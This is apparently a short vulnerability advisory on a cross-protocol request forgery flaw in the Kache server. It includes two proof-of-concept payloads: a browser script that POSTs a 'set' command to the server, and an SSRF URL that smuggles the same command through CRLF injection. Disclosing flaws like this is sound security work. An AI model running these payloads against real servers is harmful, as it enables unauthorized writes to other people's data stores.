Kache Cross Protocol Request Forgery

Kache as of commit de2c39491625c3f087027be961a17191e85f6d30 suffers from a cross protocol request forgery vulnerability.


MD5 | 94810b65a0abff4e8aa4dbe67a50216b

# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)
# Category: go, resp, cprf

[1]CPRF (Cross Protocol Request Forgery)
--------------------------------
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.

- POC 1: Set a key by HTTP:

<script>
var x = new XMLHttpRequest();
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");
x.send("set mykey myvalue\n");
</script>

- POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:

https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue

Related Posts